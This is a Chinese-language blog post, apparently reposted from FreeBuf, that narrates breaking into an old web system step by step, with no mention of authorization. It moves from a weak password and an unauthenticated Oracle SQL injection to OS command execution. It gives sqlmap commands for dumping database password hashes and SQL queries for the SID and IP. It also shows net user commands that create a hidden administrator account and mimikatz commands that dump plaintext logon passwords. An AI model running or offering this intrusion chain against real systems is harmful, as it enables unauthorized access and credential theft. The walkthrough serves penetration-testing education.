一次从弱口令到getshell

墨蓝 2024-04-07 10:39 83阅读 0赞

### 0x01 弱口令 ###

在一次针对某站点信息收集的过程中，通过子域名扫描，扫描到某个老旧系统。

![1629098949\_611a13c5e2023f68aa123.png!small?1629098952907][1629098949_611a13c5e2023f68aa123.png_small_1629098952907]

一看这都2014年的老站了，肯定有搞头！

日常使用burp爆破一波试试，没爆破出来

但是随手一试，好家伙123/123进入系统，属于是运气拉满了

(高强度打码)

![1629099157\_611a149547fda2b8e9964.png!small?1629099159494][1629099157_611a149547fda2b8e9964.png_small_1629099159494]

这里能看到是一个“编辑”人员的权限，并没有什么上传等后台管理的功能，只能耐心过一遍系统的各种功能。

### 0x02 SQL注入 ###

进入系统翻一翻，没有什么敏感信息泄露，但是在一处查询人员信息的接口发现了SQL注入(xray被动扫描扫出来的)

http://host.com/xxx/control/SearchMenHunInfo?**content**=123

这时想要手工验证一下，发现甚至不需要后台cookie就能直接访问该接口，相当于还存在未授权访问漏洞。

那这sqlmap一把梭，--cookie参数都不用加了

> python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?**content**=123" --current-db

![1629100685\_611a1a8d4ca7c7edef78d.png!small?1629100687369][1629100685_611a1a8d4ca7c7edef78d.png_small_1629100687369]

这里跑出了库名，还能看到这是一个Oracle数据库。打算继续拿shell试试。

但是在我日常渗透过程中，Oracle数据库并不常见，sqlmap中--os-shell参数还是不支持Oracle数据库的，只能现学现卖一波。

### 0x03 getshell ###

首先参考了这篇文章 [Oracle注入 - 命令执行&Shell反弹][Oracle_ - _Shell]

![1629101572\_611a1e0406da1334227dd.png!small?1629101573386][1629101572_611a1e0406da1334227dd.png_small_1629101573386]

文章中介绍到以下版本的Oracle在发现注入后可以命令执行

那么再用sqlmap查看一下Oracle版本

> python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?**content**=123" -b

![1629101914\_611a1f5a2cdcceb802e83.png!small?1629101915711][1629101914_611a1f5a2cdcceb802e83.png_small_1629101915711]

看来是符合可以命令执行的版本的！

又经历了一波漫长的学习，发现了github一个大佬已经集成好的工具 [oracleShell oracle 数据库命令执行][oracleShell oracle]

工具截图如下

![1629102386\_611a2132b089bb783a905.png!small?1629102388399][1629102386_611a2132b089bb783a905.png_small_1629102388399]

可以看出，我们还需要知道数据库的SID，用户名，密码，就可以尝试执行命令。

那么就继续利用sqlmap来扩大我们已知信息。

查看数据库权限--is-dba

![1629102568\_611a21e8e65e1527c6a5a.png!small?1629102570531][1629102568_611a21e8e65e1527c6a5a.png_small_1629102570531]

查看数据库IP，SID

这里进入sqlmap的--sql-shell模式，用sql语句来查询

查询SID：select instance\_name from v$instance

查询当前IP：select sys\_context('userenv','ip\_address') from dual

![1629102806\_611a22d69a7674a91543f.png!small?1629102808241][1629102806_611a22d69a7674a91543f.png_small_1629102808241]

爆破所有数据库账号、密码

使用sqlmap的--passwords参数，跑出数据库的所用用户名和对应的密码

经过漫长的等待，终于有了结果(这里给出的是虚构的数据)

database management system users password hashes:
    [*] ANONYMOUS [1]:
        password hash: anonymous
    [*] HR [1]:
        password hash: 6399F3B38EDF3288
    [*] SYS [1]:
        password hash: 4DE42795E66117AE
    [*] SYSMAN [1]:
        password hash: B607EEBB3A2D36D0
    [*] SYSTEM[1]:
        password hash: 8877FF8306EF558B
        clear-text password: SYS

可以看到有些用户名只得到了对应的哈希，但是其中一个用户名system成功跑出了明文密码！

查询Oracle常用端口

Oracle确实不熟悉，百度查一波端口：

查询发现，服务端默认的端口号一般是389，客户端默认的端口号一般都是1521

OK！现在已经拥有了IP，PORT，SID，用户名(SYSTEM)，密码(SYS)，可以直接使用工具连接了。

![1629103630\_611a260eddcad3e1ff238.png!small?1629103632329][1629103630_611a260eddcad3e1ff238.png_small_1629103632329]

一切顺利！取得了system权限！

### 0x04 进一步证明危害 ###

创建个用户试试

net user name pwd /add

net localgroup Administrators name /add

远程桌面RDP连接 name/pwd

![1629104189\_611a283d93beace7f71e7.png!small?1629104197524][1629104189_611a283d93beace7f71e7.png_small_1629104197524]

连接成功！

上传一个mimikatz，抓取管理员明文密码

privilege::debug

sekurlsa::logonPasswords

![1629104190\_611a283e48986590be6e9.png!small?1629104197526][1629104190_611a283e48986590be6e9.png_small_1629104197526]

最终成功登录Administrator账号RDP

![1629104196\_611a284403ee7334b6697.png!small?1629104197528][1629104196_611a284403ee7334b6697.png_small_1629104197528]

至此，渗透结束。

### 0x05 总结 ###

弱口令->sql注入->getshell->拿下管理员权限

1.通过子域名扫描工具对目标域名进行扫描，发现存在一个人力资源管理系统

2.通过手动测试123/123弱口令进入系统

3.在后台的查询人员处存在SQL注入漏洞(xray被动扫描扫出来的)

4.通过sqlmap跑出当前数据库为oracle

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --current-db

5.sqlmap中--os-shell参数是不支持Oracle数据库的,因此这里只能通过--os-sql来查找敏感信息

6.查询oracle版本，发现版本为10.2.1.0(oracle能执行命令的版本为8.1.7.4,9.2.01-9.2.0.7,10.1.0.2-10.1.0.4,10.2.0.1-10.2.0.2)

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" -b

7.查询数据库权限，是DBA权限

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --is-dba

8.通过--os-sql来查找查看数据库IP，SID

select instance\_name from v$instance //查询SID

select sys\_context('userenv','ip\_address') from dual //查询当前IP

9.通过sqlmap进行password dump出,用户名system成功跑出了明文密码

python sqlmap.py -u "http://host.com/xxx/control/SearchMenHunInfo?content=123" --passwords

10.同时通过nmap扫描出数据库服务器IP开放了1521端口。

11.通过oracleshell工具远程连接数据库，并执行系统命令

12.在命令中添加用户名和密码并添加到管理员组，通过注册表开启远程桌面。

net user name pwd /add

net localgroup Administrators name /add

13.通过mimikatz读取到系统的密码

privilege::debug

sekurlsa::logonPasswords

原文链接[： ][Link 1] [https://www.freebuf.com/articles/web/284911.html][https_www.freebuf.com_articles_web_284911.html]

[1629098949_611a13c5e2023f68aa123.png_small_1629098952907]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/53be6e2280b84408917136c21e5cc9ab.png
[1629099157_611a149547fda2b8e9964.png_small_1629099159494]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/68f56eeb211d43bc8d325a5b320ffc7c.png
[1629100685_611a1a8d4ca7c7edef78d.png_small_1629100687369]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5a398f2eedc6481fb92772031d34e9bf.png
[Oracle_ - _Shell]: https://redn3ck.github.io/2018/04/25/Oracle%E6%B3%A8%E5%85%A5-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-Shell%E5%8F%8D%E5%BC%B9/
[1629101572_611a1e0406da1334227dd.png_small_1629101573386]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/146b080df807496597bf49e3afdf387b.png
[1629101914_611a1f5a2cdcceb802e83.png_small_1629101915711]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1d823de11a124d789e557f5bb40de795.png
[oracleShell oracle]: https://github.com/jas502n/oracleShell
[1629102386_611a2132b089bb783a905.png_small_1629102388399]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ecad29c83d034464913da418b72897bc.png
[1629102568_611a21e8e65e1527c6a5a.png_small_1629102570531]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4c39562f53fd4c3795a040fce9febaec.png
[1629102806_611a22d69a7674a91543f.png_small_1629102808241]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7be091cf1dc5435287e42a392876aaa3.png
[1629103630_611a260eddcad3e1ff238.png_small_1629103632329]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/2aba4860a329443d9177a9efdac5d932.png
[1629104189_611a283d93beace7f71e7.png_small_1629104197524]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e9dec90fb14d42ae86a42532f3e14df1.png
[1629104190_611a283e48986590be6e9.png_small_1629104197526]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ece68a4ae3614eb5aa0556bc9e64c3e6.png
[1629104196_611a284403ee7334b6697.png_small_1629104197528]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4dc989bcb9ed43f4b45de46e431486c9.png
[Link 1]: https://www.freebuf.com/
[https_www.freebuf.com_articles_web_284911.html]: https://www.freebuf.com/articles/web/284911.html